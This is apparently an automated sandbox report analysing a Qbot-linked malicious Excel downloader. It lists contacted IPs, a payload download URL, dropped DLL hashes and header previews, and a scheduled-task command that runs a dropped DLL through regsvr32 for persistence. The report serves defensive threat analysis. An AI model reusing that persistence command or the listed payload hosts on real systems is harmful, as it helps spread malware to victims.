cmd line tools excessively to alter registry or file data 35->62 64 Drops PE files to the user root directory 35->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 35->66 42 schtasks.exe 35->42         started        process14

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        No Antivirus matches

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.4314974537[1].dat100%Joe Sandbox ML
                        C:\Users\user\Drezd.red12%VirustotalBrowse
                        C:\Users\user\Drezd.red9%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.%s.comPA0%URL Reputationsafe
                        http://190.14.37.178/44467.4314974537.dat0%Avira URL Cloudsafe
                        http://servername/isapibackend.dll0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://190.14.37.178/44467.4314974537.datfalse
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.%s.comPAregsvr32.exe, 00000006.00000002.714305693.0000000002130000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.978572746.0000000002200000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.726210160.0000000000D40000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        low
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000006.00000002.714305693.0000000002130000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.978572746.0000000002200000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.726210160.0000000000D40000.00000002.00020000.sdmpfalse
                          high
                          http://servername/isapibackend.dllregsvr32.exe, 00000005.00000002.715638462.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.713507850.0000000001E30000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.716290296.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.717086982.0000000001CD0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.727982832.0000000000950000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.725827526.0000000000940000.00000002.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          low

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          185.183.96.67
                          unknownNetherlands
                          60117HSAEfalse
                          190.14.37.178
                          unknownPanama
                          52469OffshoreRacksSAPAfalse
                          185.250.148.213
                          unknownRussian Federation
                          48430FIRSTDC-ASRUfalse

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:492061
                          Start date:28.09.2021
                          Start time:10:21:25
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 36s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:Compensation-2100058996-09272021.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winXLS@25/6@0/3
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 23.2% (good quality ratio 21.6%)
                          • Quality average: 75.9%
                          • Quality standard deviation: 28.2%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Changed system and user locale, location and keyboard layout to English - United States
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:23:40API Interceptor28x Sleep call for process: regsvr32.exe modified
                          10:23:42API Interceptor884x Sleep call for process: explorer.exe modified
                          10:23:44API Interceptor2x Sleep call for process: schtasks.exe modified
                          10:23:45Task SchedulerRun new task: uwqvoal path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          185.183.96.67#Qbot downloader.xlsGet hashmaliciousBrowse
                          • 185.183.96.67/44466.8890891204.dat
                          Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67/44466.7516903935.dat
                          Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67/44466.7022844907.dat
                          190.14.37.178Compensation-1657705079-09272021.xlsGet hashmaliciousBrowse
                          • 190.14.37.178/44466.9668618056.dat
                          Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
                          • 190.14.37.178/44466.9633799768.dat
                          #Qbot downloader.xlsGet hashmaliciousBrowse
                          • 190.14.37.178/44466.8890891204.dat
                          Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
                          • 190.14.37.178/44466.7516903935.dat
                          Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse
                          • 190.14.37.178/44466.7022844907.dat

                          Domains

                          No context

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          HSAECompensation-1657705079-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          #Qbot downloader.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse
                          • 185.183.96.67
                          KHI13mrm4c.exeGet hashmaliciousBrowse
                          • 185.183.98.2
                          Copy of Payment-228607772-09222021.xlsGet hashmaliciousBrowse
                          • 185.82.202.248
                          NJS4hNBeUR.exeGet hashmaliciousBrowse
                          • 185.198.57.68
                          rQoEGMGufv.exeGet hashmaliciousBrowse
                          • 185.45.192.203
                          5ya8R7LxXl.exeGet hashmaliciousBrowse
                          • 185.45.192.203
                          Uz2eSldsZe.exeGet hashmaliciousBrowse
                          • 185.45.192.203
                          SWIFT_COPY.htmGet hashmaliciousBrowse
                          • 194.36.191.196
                          3hTS09wZ7G.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          OC2Z0JbqfA.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          89o9iHBGiB.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          DWVByMCYL8.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          DUpgpAnHkq.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          7EAz8cQ49v.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          f9aoawyl4M.exeGet hashmaliciousBrowse
                          • 185.183.96.3
                          OffshoreRacksSAPACompensation-1657705079-09272021.xlsGet hashmaliciousBrowse
                          • 190.14.37.178
                          Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
                          • 190.14.37.178
                          #Qbot downloader.xlsGet hashmaliciousBrowse
                          • 190.14.37.178
                          Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
                          • 190.14.37.178
                          Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse
                          • 190.14.37.178
                          Claim-838392655-09242021.xlsGet hashmaliciousBrowse
                          • 190.14.37.173
                          claim.xlsGet hashmaliciousBrowse
                          • 190.14.37.173
                          Claim-1368769328-09242021.xlsGet hashmaliciousBrowse
                          • 190.14.37.173
                          Claim-1763045001-09242021.xlsGet hashmaliciousBrowse
                          • 190.14.37.173
                          Claim-680517779-09242021.xlsGet hashmaliciousBrowse
                          • 190.14.37.173
                          Payment-687700136-09212021.xlsGet hashmaliciousBrowse
                          • 190.14.37.232
                          Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3
                          Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3
                          Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3
                          Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3
                          Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3
                          Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3
                          Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3
                          Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3
                          Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                          • 190.14.37.3

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          C:\Users\user\Drezd.redCompensation-1657705079-09272021.xlsGet hashmaliciousBrowse
                            Compensation-1214892625-09272021.xlsGet hashmaliciousBrowse
                              #Qbot downloader.xlsGet hashmaliciousBrowse
                                Compensation-2308017-09272021.xlsGet hashmaliciousBrowse
                                  Compensation-1730406737-09272021.xlsGet hashmaliciousBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.4314974537[1].dat
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):387072
                                    Entropy (8bit):4.52850738525501
                                    Encrypted:false
                                    SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2Mp:vs6Xpq0H3Jhds/9+qC/zfTPLX
                                    MD5:F6CC787BB41B7500C5A8CBAC69719F47
                                    SHA1:CB3E68EE0DED8625C39D45DA45CB3F637A958380
                                    SHA-256:1FE2FF723730694954E8A1C9C06873C7A4376BDFCAFDB1C5C562A4ECA1C5ED6C
                                    SHA-512:6DDE19CE6B8FE4D66B7B805336AB8558B556F4F90ED7F4FB71E864BC5656CE353536CF78829B51D75321AC78FA171873F0D6B26100137AC0B4167A7C029F22F7
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162688
                                    Entropy (8bit):4.254406145670295
                                    Encrypted:false
                                    SSDEEP:1536:C6qL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CHJNSc83tKBAvQVCgOtmXmLpLm4l
                                    MD5:CE4C6F2E69D0C41D112F6E2E15D91BEA
                                    SHA1:C82A5649FB72190F638CF670AD61054BABA6798F
                                    SHA-256:F102A88B19F9A1E77E3DA8131AA3A9F3FED09624B877E12D6FE7904D5FAB3D44
                                    SHA-512:6CA64EE7E29CA1C5DC45C343F3394FDEE3B7BDF414AEC5AB7E477771E20242AAA29E35B376DB822AB15C5BA89102507B80E9829DFB332B2D06B2ECE91E682F2A
                                    Malicious:false
                                    Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                                    C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):15676
                                    Entropy (8bit):4.532454639094322
                                    Encrypted:false
                                    SSDEEP:192:5GxlE11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:5G3oxesT20lheZ3waE5D7qxIxkxe
                                    MD5:21AD64E5A31F72F116AC1B795158E7A9
                                    SHA1:B519A4EC430A5FB56FDC079B2B1DC19BB23CB36F
                                    SHA-256:31A3260BDFB94EE5E312E6F8C7249B19908FC09104DC0B130D39A7EAA66E5B4F
                                    SHA-512:14DA5873EC106FF15057C440B45CE1FDC76AC475A276AF158C25EAF6776E9DE10578992A8115B970F67B3ACDF2602940B52152754AC14ED347C31481D360AAE4
                                    Malicious:false
                                    Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... .................._.TWE...~Y............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...
                                    C:\Users\user\Drezd.red
                                    Process:C:\Windows\SysWOW64\explorer.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):387072
                                    Entropy (8bit):1.6961804656486577
                                    Encrypted:false
                                    SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
                                    MD5:B19B0AF9A01DD936D091C291B19696C8
                                    SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
                                    SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
                                    SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Virustotal, Detection: 12%, Browse
                                    • Antivirus: ReversingLabs, Detection: 9%
                                    Joe Sandbox View:
                                    • Filename: Compensation-1657705079-09272021.xls, Detection: malicious, Browse
                                    • Filename: Compensation-1214892625-09272021.xls, Detection: malicious, Browse
                                    • Filename: #Qbot downloader.xls, Detection: malicious, Browse
                                    • Filename: Compensation-2308017-09272021.xls, Detection: malicious, Browse
                                    • Filename: Compensation-1730406737-09272021.xls, Detection: malicious, Browse
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
                                    Entropy (8bit):7.131912306364678
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 47.99%
                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                    File name:Compensation-2100058996-09272021.xls
                                    File size:129024
                                    MD5:4658146f947ea498baaf9cf542ad0fc5
                                    SHA1:7e5ff8360eba1e466a301e0e562574ae333f7a89
                                    SHA256:7113398b5e27483757f79c346d4357014e972bb103d0fc8cc03ab2641d51eb8d
                                    SHA512:4e8b579d0b2cdfeddfd4ea7a25d688f8252e0a4cbe9379f8172c4e5203bbc8457526c8c692a989be9932dd00deee0b5c55e2875c2d4c1ee2e26f6c5a0acb4884
                                    SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiilBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAnE
                                    File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4eea286a4b4bcb4

                                    Static OLE Info

                                    General

                                    Document Type:OLE
                                    Number of OLE Files:1

                                    OLE File "Compensation-2100058996-09272021.xls"

                                    Indicators

                                    Has Summary Info:True
                                    Application Name:Microsoft Excel
                                    Encrypted Document:False
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:
                                    Flash Objects Count:
                                    Contains VBA Macros:True

                                    Summary

                                    Code Page:1251
                                    Author:Test
                                    Last Saved By:Test
                                    Create Time:2015-06-05 18:17:20
                                    Last Saved Time:2021-09-27 09:38:52
                                    Creating Application:Microsoft Excel
                                    Security:0

                                    Document Summary

                                    Document Code Page:1251
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:1048576

                                    Streams with VBA

                                    VBA File Name: UserForm2, Stream Size: -1
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/UserForm2
                                    VBA File Name:UserForm2
                                    Stream Size:-1
                                    Data ASCII:
                                    Data Raw:
                                    VBA Code
                                    VBA File Name: Module5, Stream Size: 4241
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Module5
                                    VBA File Name:Module5
                                    Stream Size:4241
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 9c 0d 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    VBA File Name: Sheet1, Stream Size: 991
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                    VBA File Name:Sheet1
                                    Stream Size:991
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    VBA File Name: ThisWorkbook, Stream Size: 2501
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                    VBA File Name:ThisWorkbook
                                    Stream Size:2501
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 a9 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    VBA File Name: UserForm2, Stream Size: 1182
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
                                    VBA File Name:UserForm2
                                    Stream Size:1182
                                    Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code

                                    Streams

                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                                    General
                                    Stream Path:\x1CompObj
                                    File Type:data
                                    Stream Size:108
                                    Entropy:4.18849998853
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:244
                                    Entropy:2.65175227267
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:208
                                    Entropy:3.33231709703
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
                                    General
                                    Stream Path:Workbook
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:101831
                                    Entropy:7.65479066874
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:662
                                    Entropy:5.27592988154
                                    Base64 Encoded:True
                                    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
